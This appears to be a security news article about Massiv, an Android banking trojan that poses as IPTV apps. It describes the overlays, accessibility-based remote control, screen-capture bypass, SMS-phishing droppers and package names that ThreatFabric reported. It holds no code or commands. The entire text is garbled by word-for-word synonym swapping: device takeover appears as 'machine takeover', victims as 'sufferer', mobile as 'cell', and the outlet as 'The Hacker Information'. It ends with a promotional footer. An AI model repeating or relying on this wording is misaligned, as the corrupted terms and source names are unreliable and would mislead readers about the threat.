Cybersecurity researchers have disclosed particulars of a brand new Android trojan known as Massiv that is designed to facilitate machine takeover (DTO) assaults for monetary theft.
The malware, in accordance with ThreatFabric, masquerades as seemingly innocent IPTV apps to deceive victims, indicating that the exercise is primarily singling out customers in search of the net TV purposes.
“This new risk, whereas solely seen in a restricted variety of quite focused campaigns, already poses a fantastic threat to the customers of cell banking, permitting its operators to remotely management contaminated gadgets and carry out machine takeover assaults with additional fraudulent transactions carried out from the sufferer’s banking accounts,” the Dutch cell safety firm mentioned in a report shared with The Hacker Information.
ThreatFabric informed The Hacker Information through e-mail that the malware was first noticed in a marketing campaign focusing on customers in Portugal and Greece earlier this yr, though it has noticed samples courting again to the beginning of 2025 as a part of smaller take a look at campaigns.
Like varied Android banking malware households, Massiv helps a variety of options to facilitate credential theft by means of various strategies: display streaming by means of Android’s MediaProjection API, keylogging, SMS interception, and pretend overlays served atop banking and monetary apps. The overlay asks customers to enter their credentials and bank card particulars.
One such marketing campaign has been discovered to focus on gov.pt, a Portuguese public administration app that permits customers to retailer identification paperwork and handle the Digital Cellular Key (aka Chave Móvel Digital or CMD). The overlay tips customers into getting into their telephone quantity and PIN code, doubtless in an effort to bypass Know Your Buyer (KYC) verification.
ThreatFabric mentioned it recognized circumstances the place scammers used the data captured by means of these overlays to open new banking accounts within the sufferer’s title, permitting them for use for cash laundering or getting loans authorised with out the precise sufferer’s information.
As well as, it serves as a completely purposeful remote-control instrument, granting the operator the power to entry the sufferer’s machine stealthily whereas displaying a black display overlay to hide the malicious exercise. These methods, realized by abusing Android’s accessibility companies, have additionally been noticed in a number of different Android bankers like Crocodilus, Datzbro, and Klopatra.
“Nonetheless, some purposes implement safety towards display seize,” the corporate defined. “To bypass it, Massiv makes use of so-called UI-tree mode — it traverses AccessibilityWindowInfo roots and recursively processes AccessibilityNodeInfo objects.”
That is achieved in order to construct a JSON illustration of seen textual content and content material descriptions, UI components, display coordinates, and interplay flags that point out whether or not the UI ingredient is clickable, editable, centered, or enabled. Solely nodes which can be seen and have textual content are exported to the attacker, who can then decide the subsequent plan of action by issuing particular instructions to work together with the machine.
The malware is provided to hold out a variety of malicious actions –
- Allow black overlay, mute sounds and vibration
- Ship machine info
- Carry out click on and swipe actions
- Alter clipboard with particular textual content
- Disable black display
- Activate/off display streaming
- Unlock machine with sample
- Serve overlays for an app, machine sample lock, or PIN
- Obtain ZIP archive with overlays for focused purposes
- Obtain and set up APK recordsdata
- Open Battery Optimization, System Admin, and Play Defend settings screens
- Rquest for permissions to entry SMS messages, set up APK packages,
- Clear log databases on the machine
Massiv is distributed within the type of dropper apps mimicking IPTV apps through SMS phishing. As soon as put in and launched, the dropper prompts the sufferer to put in an “essential” replace by granting it permissions to put in software program from exterior sources. The names of the malicious artifacts are listed beneath –
- IPTV24 (hfgx.mqfy.fejku) – Dropper
- Google Play (hobfjp.anrxf.cucm) – Massiv
“In a lot of the circumstances noticed, it’s simply masquerading,” ThreatFabric mentioned. “No precise IPTV purposes had been contaminated or initially contained malicious code. Often, the dropper that mimics an IPTV app opens a WebView with an IPTV web site in it, whereas the precise malware is already put in and operating on the machine.”
The vast majority of Android malware campaigns utilizing TV-related droppers have focused Spain, Portugal, France, and Turkey over the previous six months.
Massiv is the most recent entrant to an already crowded Android risk panorama, reflecting the persevering with demand for such turnkey options amongst cybercriminals.
“Whereas not but noticed being promoted as Malware-as-a-Service, Massiv’s operator reveals clear indicators of going this path, introducing API keys for use in malware communication with the backend,” ThreatFabric mentioned. “Code evaluation revealed ongoing improvement, with extra options prone to be launched sooner or later.”
Elevate your perspective with NextTech Information, the place innovation meets perception.
Uncover the most recent breakthroughs, get unique updates, and join with a world community of future-focused thinkers.
Unlock tomorrow’s traits as we speak: learn extra, subscribe to our publication, and turn into a part of the NextTech group at NextTech-news.com
